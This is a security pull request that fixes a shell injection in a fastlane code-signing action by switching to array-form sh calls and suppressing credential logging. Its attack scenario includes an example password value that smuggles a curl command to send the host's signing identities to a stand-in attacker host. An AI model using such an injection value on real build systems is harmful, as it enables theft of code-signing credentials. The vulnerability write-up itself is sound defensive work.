### PR TITLE
security: CWE-78: Fix shell injection in tkdriverconfig — VC-53719

### DIFF
--- a/fastlane/actions/venafi_codesign_auth.rb
+++ b/fastlane/actions/venafi_codesign_auth.rb
@@ -7,8 +7,8 @@ module Fastlane
     class VenafiCodesignAuthAction < Action
       def self.run(params)
         # fastlane will take care of reading in the parameter and fetching the environment variable:
-        sh "tkdriverconfig getgrant --force --authurl=#{params[:tpp_url]}/vedauth --hsmurl=#{params[:tpp_url]}/vedhsm --username=#{params[:tpp_username]} --password=#{params[:tpp_password]}"
-        sh "tkdriverconfig sync"
+        sh("tkdriverconfig", "getgrant", "--force", "--authurl=#{params[:tpp_url]}/vedauth", "--hsmurl=#{params[:tpp_url]}/vedhsm", "--username=#{params[:tpp_username]}", "--password=#{params[:tpp_password]}", log: false)
+        sh("tkdriverconfig", "sync", log: false)
         #sh "codesign -v --force -o runtime -s \"#{params[:identity]}\" #{params[:app_path]}"
         #sh "tkdriverconfig revokegrant --force"
       end


### PR DESCRIPTION
## Summary

This PR fixes a critical shell injection vulnerability (CWE-78) in the Venafi CodeSign authentication action. The vulnerability allowed attackers who could influence environment variables or commit to `.env` files to execute arbitrary commands on the macOS code-signing host.

## Finding

**Severity**: High (CVSS 9.3)  
**CWE**: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

The `VenafiCodesignAuthAction.run()` method interpolated user-controlled parameters (`tpp_url`, `tpp_username`, `tpp_password`) directly into a single-string shell command without escaping or quoting. This allowed shell metacharacters in any of these values to be interpreted by `/bin/sh -c`, enabling command injection.

**Vulnerable code path**:
- Parameters bound from `FL_TPP_URL`, `FL_TPP_USERNAME`, `FL_TPP_PASSWORD` environment variables
- Only validation: non-empty check (no character filtering)
- Sink: `sh "tkdriverconfig getgrant ... --password=#{params[:tpp_password]}"`
- Execution via `/bin/sh -c` enabled shell metacharacter interpretation

**Attack scenario**: An attacker with ability to set environment variables (e.g., via PR-modified `.env` file or unprotected CI variables) could inject commands like:
```ruby
FL_TPP_PASSWORD='x; curl attacker.com/$(security find-identity); #'
```

## Remediation

Replaced single-string `sh` invocations with array-form `sh()` calls that bypass shell interpretation:

**Before**:
```ruby
sh "tkdriverconfig getgrant --force --authurl=#{params[:tpp_url]}/vedauth ... --password=#{params[:tpp_password]}"
```

**After**:
```ruby
sh("tkdriverconfig", "getgrant", "--force", "--authurl=#{params[:tpp_url]}/vedauth", ..., "--password=#{params[:tpp_password]}", log: false)
```

Array-form `sh()` passes arguments directly to `execve()` without shell tokenization. Shell metacharacters (`;`, `&&`, `|`, `$()`, backticks, etc.) are now treated as literal string content within their respective argument positions.

Added `log: false` to prevent credential exposure in logs (addresses related CWE-532 finding).

## Verification

- **Static analysis**: Confirmed vulnerable code path from ticket description present in `fastlane/actions/venafi_codesign_auth.rb:10-11`
- **Fix validation**: Array-form `sh()` eliminates `/bin/sh -c` invocation; shell metacharacters now inert
- **Bypass check**: No residual CWE-88 risk (values concatenated after `--name=`, not parsed as separate flags)
- **Regression**: Legitimate passwords containing special characters (`&`, `!`, spaces) now work correctly instead of breaking the shell command

---

Related: Jira ticket VC-53719, Epic VC-53597